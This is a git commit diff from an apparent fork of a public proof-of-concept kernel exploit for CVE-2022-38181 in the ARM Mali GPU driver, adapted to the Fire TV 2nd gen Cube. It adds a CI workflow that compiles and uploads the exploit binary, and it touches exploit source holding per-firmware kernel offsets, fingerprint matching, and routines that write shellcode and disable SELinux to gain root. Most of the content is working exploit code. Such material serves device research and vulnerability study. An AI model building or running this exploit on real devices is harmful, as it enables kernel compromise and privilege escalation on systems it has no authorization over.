Add build workflow

.github/workflows/compile.yml

@@ -0,0 +1,27 @@
+name: Compile
+
+on:
+  push:
+    paths:
+      - '*.c'
+      - '*.h'
+      - '.github/workflows/compile.yml'
+  workflow_dispatch:
+
+jobs:
+  compile:
+    name: Compile
+    runs-on: ubuntu-latest
+
+    steps:
+      - name: Checkout
+        uses: actions/checkout@v4
+
+      - name: Compile
+        run: $ANDROID_NDK/toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi28-clang -DSHELL mali_shrinker_mmap32.c -o shrinker
+
+      - name: Uplaod
+        uses: actions/upload-artifact@v4
+        with:
+          name: CVE-2022-38181
+          path: shrinker

.gitignore

@@ -0,0 +1 @@
+/shrinker

README.md

@@ -1,6 +1,6 @@
 ## Exploit for CVE-2022-38181 for FireTV 2nd gen Cube
 
-This is a fork of security researcher Man Yue Mo's <a href="https://github.com/github/securitylab/tree/main/SecurityExploits/Android/Mali/CVE_2022_38181">Pixel 6 POC</a> for CVE_2022_38181.  Read his detailed write-up of the vulnerability <a href="https://github.blog/2023-01-23-pwning-the-all-google-phone-with-a-non-google-bug/">here</a>.  Changes have been made to account for FireOS's 32bit userspace, as well as the 2nd gen Cube's older Bifrost drivers (r16p0) and Linux kernel (4.9.113) versions. The POC exploits a bug in the ARM Mali kernel driver to gain arbitrary kernel code execution, which is then used to disable SELinux and gain root.  
+This is a fork of security researcher Man Yue Mo's [Pixel 6 POC](https://github.com/github/securitylab/tree/main/SecurityExploits/Android/Mali/CVE_2022_38181) for CVE-2022-38181.  Read his detailed write-up of the vulnerability [here](https://github.blog/2023-01-23-pwning-the-all-google-phone-with-a-non-google-bug/).  Changes have been made to account for FireOS's 32bit userspace, as well as the 2nd gen Cube's older Bifrost drivers (r16p0) and Linux kernel (4.9.113) versions. The POC exploits a bug in the ARM Mali kernel driver to gain arbitrary kernel code execution, which is then used to disable SELinux and gain root.
 
 I used the following command to compile with clang in ndk-21:
 ```

mali_base_jm_kernel.h

@@ -831,7 +831,6 @@ struct base_jd_atom_v2 {
 //	__u8 jobslot;			//missing from Bifrost r16p0
 	base_jd_core_req core_req;
 //	__u8 renderpass_id;		//missing from Bifrost r16p0
-	
 };
 */
 typedef struct base_jd_atom_v2 {
@@ -1233,4 +1232,3 @@ struct base_dump_cpu_gpu_counters {
 };
 
 #endif /* _UAPI_BASE_JM_KERNEL_H_ */
-

mali_shrinker_mmap32.c

@@ -233,7 +233,7 @@
 
 // PS7624/3337
 #define SELINUX_ENFORCING_7624_3337 0x185d634
-#define SEL_READ_HANDLE_UNKNOWN_7624_3337 0x3641c4 
+#define SEL_READ_HANDLE_UNKNOWN_7624_3337 0x3641c4
 #define INIT_CRED_7624_3337 0x15fb568
 #define COMMIT_CREDS_7624_3337 0x4ccb0
 #define ADD_INIT_7624_3337 0x9115a000		//add x0, x0, #0x568
@@ -300,7 +300,7 @@ void setup_mali(int fd, int group_id) {
   struct kbase_ioctl_set_flags set_flags = {0};
   if (ioctl(fd, KBASE_IOCTL_SET_FLAGS, &set_flags) < 0) {
     err(1, "set flags failed\n");
-  } 
+  }
 }
 
 
@@ -329,7 +329,7 @@ void jit_init(int fd, uint64_t va_pages, uint64_t trim_level, int group_id) {
 uint64_t jit_allocate(int fd, uint8_t atom_number, uint8_t id, uint64_t va_pages, uint64_t gpu_alloc_addr, uint64_t* gpu_alloc_region) {
   struct base_jit_alloc_info info = {0};
   struct base_jd_atom_v2 atom = {0};
-  
+
   info.id = id;
   info.gpu_alloc_addr = gpu_alloc_addr;
   info.va_pages = va_pages;
@@ -366,7 +366,7 @@ void jit_free(int fd, uint8_t atom_number, uint8_t id) {
   if (ioctl(fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) {
     err(1, "submit job failed\n");
   }
-    
+
 }
 
 void mem_flags_change(int fd, uint64_t gpu_addr, uint32_t flags, int ignore_results) {
@@ -648,7 +648,7 @@ void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, e
   struct MALI_JOB_HEADER jh = {0};
   jh.is_64b = true;
   jh.type = MALI_JOB_TYPE_WRITE_VALUE;
-  
+
   struct MALI_WRITE_VALUE_JOB_PAYLOAD payload = {0};
   payload.type = type;
   payload.immediate_value = value;
@@ -743,166 +743,166 @@ void select_offset() {
   char fingerprint[256];
   int len = __system_property_get("ro.build.fingerprint", fingerprint);
   LOG("fingerprint: %s\n", fingerprint);
- 
+
   if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7212/1333N:user/amz-p,release-keys")) {
     selinux_enforcing = SELINUX_ENFORCING_7212_1333;
     sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7212_1333;
     fixup_root_shell(INIT_CRED_7212_1333, COMMIT_CREDS_7212_1333, SEL_READ_HANDLE_UNKNOWN_7212_1333, ADD_INIT_7212_1333, ADD_COMMIT_7212_1333);
-    return;  
-  } 
-  
+    return;
+  }
+
   if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7216/1582N:user/amz-p,release-keys")) {
     selinux_enforcing = SELINUX_ENFORCING_7216_1582;
     sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7216_1582;
     fixup_root_shell(INIT_CRED_7216_1582, COMMIT_CREDS_7216_1582, SEL_READ_HANDLE_UNKNOWN_7216_1582, ADD_INIT_7216_1582, ADD_COMMIT_7216_1582);
-    return;  
-  } 
-  
+    return;
+  }
+
   if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7224/1752N:user/amz-p,release-keys")) {
     selinux_enforcing = SELINUX_ENFORCING_7224_1752;
     sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7224_1752;
     fixup_root_shell(INIT_CRED_7224_1752, COMMIT_CREDS_7224_1752, SEL_READ_HANDLE_UNKNOWN_7224_1752, ADD_INIT_7224_1752, ADD_COMMIT_7224_1752);
-    return;  
-  } 
+    return;
+  }
 
   if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7229/1853N:user/amz-p,release-keys")) {
     selinux_enforcing = SELINUX_ENFORCING_7229_1853;
     sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7229_1853;
     fixup_root_shell(INIT_CRED_7229_1853, COMMIT_CREDS_7229_1853, SEL_READ_HANDLE_UNKNOWN_7229_1853, ADD_INIT_7229_1853, ADD_COMMIT_7229_1853);
-    return;  
-  } 
-  
+    return;
+  }
+
   if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7229/1856N:user/amz-p,release-keys")) {
     selinux_enforcing = SELINUX_ENFORCING_7229_1856;
     sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7229_1856;
     fixup_root_shell(INIT_CRED_7229_1856, COMMIT_CREDS_7229_1856, SEL_READ_HANDLE_UNKNOWN_7229_1856, ADD_INIT_7229_1856, ADD_COMMIT_7229_1856);
-    return;  
+    return;
   }
-  
+
     if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7234/2039N:user/amz-p,release-keys")) {
     selinux_enforcing = SELINUX_ENFORCING_7234_2039;
     sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7234_2039;
     fixup_root_shell(INIT_CRED_7234_2039, COMMIT_CREDS_7234_2039, SEL_READ_HANDLE_UNKNOWN_7234_2039, ADD_INIT_7234_2039, ADD_COMMIT_7234_2039);
-    return;  
+    return;
   }
-  
+
     if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7234/2042N:user/amz-p,release-keys")) {
     selinux_enforcing = SELINUX_ENFORCING_7234_2042;
     sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7234_2042;
     fixup_root_shell(INIT_CRED_7234_2042, COMMIT_CREDS_7234_2042, SEL_READ_HANDLE_UNKNOWN_7234_2042, ADD_INIT_7234_2042, ADD_COMMIT_7234_2042);
-    return;  
+    return;
   }
 
   if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7242/2216N:user/amz-p,release-keys")) {
     selinux_enforcing = SELINUX_ENFORCING_7242_2216;
     sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7242_2216;
     fixup_root_shell(INIT_CRED_7242_2216, COMMIT_CREDS_7242_2216, SEL_READ_HANDLE_UNKNOWN_7242_2216, ADD_INIT_7242_2216, ADD_COMMIT_7242_2216);
-    return;  
-  } 
+    return;
+  }
 
  if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7242/2896N:user/amz-p,release-keys")) {
     selinux_enforcing = SELINUX_ENFORCING_7242_2896;
     sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7242_2896;
     fixup_root_shell(INIT_CRED_7242_2896, COMMIT_CREDS_7242_2896, SEL_READ_HANDLE_UNKNOWN_7242_2896, ADD_INIT_7242_2896, ADD_COMMIT_7242_2896);
-    return;  
-  } 
+    return;
+  }
 
   if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7242/2906N:user/amz-p,release-keys")) {
     selinux_enforcing = SELINUX_ENFORCING_7242_2906;
     sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7242_2906;
     fixup_root_shell(INIT_CRED_7242_2906, COMMIT_CREDS_7242_2906, SEL_READ_HANDLE_UNKNOWN_7242_2906, ADD_INIT_7242_2906, ADD_COMMIT_7242_2906);
-    return;  
-  } 
+    return;
+  }
 
   if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7242/3515N:user/amz-p,release-keys")) {
     selinux_enforcing = SELINUX_ENFORCING_7242_3515;
     sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7242_3515;
     fixup_root_shell(INIT_CRED_7242_3515, COMMIT_CREDS_7242_3515, SEL_READ_HANDLE_UNKNOWN_7242_3515, ADD_INIT_7242_3515, ADD_COMMIT_7242_3515);
-    return;  
-  } 
+    return;
+  }
 
   if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7242/3516N:user/amz-p,release-keys")) {
     selinux_enforcing = SELINUX_ENFORCING_7242_3516;
     sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7242_3516;
     fixup_root_shell(INIT_CRED_7242_3516, COMMIT_CREDS_7242_3516, SEL_READ_HANDLE_UNKNOWN_7242_3516, ADD_INIT_7242_3516, ADD_COMMIT_7242_3516);
-    return;  
-  } 
+    return;
+  }
 
   if (!strcmp(fingerprint, "Amazon/raven/raven:7.0/PS7273/2625N:user/amz-p,release-keys")) {
     selinux_enforcing = SELINUX_ENFORCING_7273_2625;
     sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7273_2625;
     fixup_root_shell(INIT_CRED_7273_2625, COMMIT_CREDS_7273_2625, SEL_READ_HANDLE_UNKNOWN_7273_2625, ADD_INIT_7273_2625, ADD_COMMIT_7273_2625);
-    return;  
-  } 
+    return;
+  }
 
   if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7279.2766N/0023253929472:user/amz-p,release-keys")) {
     selinux_enforcing = SELINUX_ENFORCING_7279_2766;
     sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7279_2766;
     fixup_root_shell(INIT_CRED_7279_2766, COMMIT_CREDS_7279_2766, SEL_READ_HANDLE_UNKNOWN_7279_2766, ADD_INIT_7279_2766, ADD_COMMIT_7279_2766);
-    return;  
-  } 
+    return;
+  }
 
   if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7285.2877N/0023723719936:user/amz-p,release-keys")) {
     selinux_enforcing = SELINUX_ENFORCING_7285_2877;
     sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7285_2877;
     fixup_root_shell(INIT_CRED_7285_2877, COMMIT_CREDS_7285_2877, SEL_READ_HANDLE_UNKNOWN_7285_2877, ADD_INIT_7285_2877, ADD_COMMIT_7285_2877);
-    return;  
-  } 
+    return;
+  }
 
   if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7285.2880N/0023723720704:user/amz-p,release-keys")) {
     selinux_enforcing = SELINUX_ENFORCING_7285_2880;
     sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7285_2880;
     fixup_root_shell(INIT_CRED_7285_2880, COMMIT_CREDS_7285_2880, SEL_READ_HANDLE_UNKNOWN_7285_2880, ADD_INIT_7285_2880, ADD_COMMIT_7285_2880);
-    return;  
-  } 
+    return;
+  }
 
   if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7292.2982N/0024126400000:user/amz-p,release-keys")) {
     selinux_enforcing = SELINUX_ENFORCING_7292_2982;
     sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7292_2982;
     fixup_root_shell(INIT_CRED_7292_2982, COMMIT_CREDS_7292_2982, SEL_READ_HANDLE_UNKNOWN_7292_2982, ADD_INIT_7292_2982, ADD_COMMIT_7292_2982);
-    return;  
-  } 
+    return;
+  }
 
   if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7292.2984N/0024126400512:user/amz-p,release-keys")) {
     selinux_enforcing = SELINUX_ENFORCING_7292_2984;
     sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7292_2984;
     fixup_root_shell(INIT_CRED_7292_2984, COMMIT_CREDS_7292_2984, SEL_READ_HANDLE_UNKNOWN_7292_2984, ADD_INIT_7292_2984, ADD_COMMIT_7292_2984);
-    return;  
-  } 
+    return;
+  }
 
   if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7603.3110N/0025065956864:user/amz-p,release-keys")) {
     selinux_enforcing = SELINUX_ENFORCING_7603_3110;
     sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7603_3110;
     fixup_root_shell(INIT_CRED_7603_3110, COMMIT_CREDS_7603_3110, SEL_READ_HANDLE_UNKNOWN_7603_3110, ADD_INIT_7603_3110, ADD_COMMIT_7603_3110);
-    return;  
-  } 
+    return;
+  }
 
   if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7608.3614N/0025468739072:user/amz-p,release-keys")) {
     selinux_enforcing = SELINUX_ENFORCING_7608_3614;
     sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7608_3614;
     fixup_root_shell(INIT_CRED_7608_3614, COMMIT_CREDS_7608_3614, SEL_READ_HANDLE_UNKNOWN_7608_3614, ADD_INIT_7608_3614, ADD_COMMIT_7608_3614);
-    return;  
-  } 
+    return;
+  }
 
   if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7614.3227N/0025938402048:user/amz-p,release-keys")) {
     selinux_enforcing = SELINUX_ENFORCING_7614_3227;
     sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7614_3227;
     fixup_root_shell(INIT_CRED_7614_3227, COMMIT_CREDS_7614_3227, SEL_READ_HANDLE_UNKNOWN_7614_3227, ADD_INIT_7614_3227, ADD_COMMIT_7614_3227);
-    return;  
-  }  
-  
+    return;
+  }
+
   if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7624.3337N/0026810845440:user/amz-p,release-keys")) {
     selinux_enforcing = SELINUX_ENFORCING_7624_3337;
     sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7624_3337;
     fixup_root_shell(INIT_CRED_7624_3337, COMMIT_CREDS_7624_3337, SEL_READ_HANDLE_UNKNOWN_7624_3337, ADD_INIT_7624_3337, ADD_COMMIT_7624_3337);
-    return;  
-  }  
-  
+    return;
+  }
+
   if (!strcmp(fingerprint, "Amazon/raven/raven:9/PS7633.3445N/0027347744000:user/amz-p,release-keys")) {
     selinux_enforcing = SELINUX_ENFORCING_7633_3445;
     sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7633_3445;
     fixup_root_shell(INIT_CRED_7633_3445, COMMIT_CREDS_7633_3445, SEL_READ_HANDLE_UNKNOWN_7633_3445, ADD_INIT_7633_3445, ADD_COMMIT_7633_3445);
-    return;  
+    return;
   }
 
   err(1, "unable to match build id\n");
@@ -1009,8 +1009,8 @@ int trigger(int mali_fd, int mali_fd2, int* flush_idx) {
       LOG("Found pgd %d, %llx\n", pgd_idx, pgd);
       atom_number++;
       write_selinux(mali_fd, mali_fd2, pgd, &(reserved[0]));
-      write_shellcode(mali_fd, mali_fd2, pgd, &(reserved[0]));	
-      run_enforce();      
+      write_shellcode(mali_fd, mali_fd2, pgd, &(reserved[0]));
+      run_enforce();
       cleanup(mali_fd, pgd);
       return 0;
     }
@@ -1080,4 +1080,3 @@ Java_com_example_hellojni_MaliExpService_stringFromJNI( JNIEnv* env, jobject thi
     return -1;
 }
 #endif
-